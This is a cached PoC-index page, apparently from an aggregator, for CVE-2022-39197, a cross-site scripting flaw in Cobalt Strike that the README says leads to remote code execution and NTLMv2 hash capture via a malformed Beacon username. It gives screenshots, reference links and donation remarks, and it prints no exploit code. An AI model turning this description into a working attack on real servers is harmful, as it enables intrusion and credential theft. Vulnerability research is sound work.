CVE-2022-39197 PoC — HelpSystems Cobalt Strike 跨站脚本漏洞

Source

https://github.com/purple-WL/Cobaltstrike-RCE-CVE-2022-39197

Associated Vulnerability

Title:HelpSystems Cobalt Strike 跨站脚本漏洞 (CVE-2022-39197)
Description:HelpSystems Cobalt Strike是美国HelpSystems公司的一个渗透测试软件。 HelpSystems Cobalt Strike 4.7及之前版本存在跨站脚本漏洞，该漏洞源于XSS（跨站脚本）漏洞，允许远程攻击者在Cobalt Strike团队服务器上执行HTML。

Readme

Cobaltstrike RCE 漏洞CVE-2022-39197复现

漏洞简述

该漏洞存在于Cobalt Strike的Beacon软件中，可能允许攻击者在Beacon配置中设置格式错误的用户名，触发XSS，从而导致在CS服务端上造成远程代码执行。

截图：
<img width="1280" alt="image" src="https://user-images.githubusercontent.com/63894044/192103980-08cda95c-6b6c-4ae8-ab54-28c28c8c1314.png">

获取NTLMv2-SSP Hash，前提是Cobalt Strike在Windows运行

<img width="519" alt="image" src="https://user-images.githubusercontent.com/63894044/192104044-ca103ccd-e9dd-4a71-913f-5a9bacb695c5.png">

参考：

https://www.freebuf.com/vuls/345522.html

https://mp.weixin.qq.com/s?__biz=MzI5Nzc3NDEyNA==&mid=2247483757&idx=1&sn=2397d14549520bac3bd7bec10d433db3&chksm=ecaebc2edbd9353803e2a3f0f5f906121db63e30e76c58654169656e9e40d5c8b5b0e8b80813&token=1380424937&lang=zh_CN#rd

https://forum.butian.net/share/708

https://github.com/Sentinel-One/CobaltStrikeParser

https://github.com/LiAoRJ/CS_fakesubmit

File Snapshot


 [4.0K]  /data/pocs/3da0550c517dce59ad1f84602994817ea0782636
└── [1009]  README.md

0 directories, 1 file

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!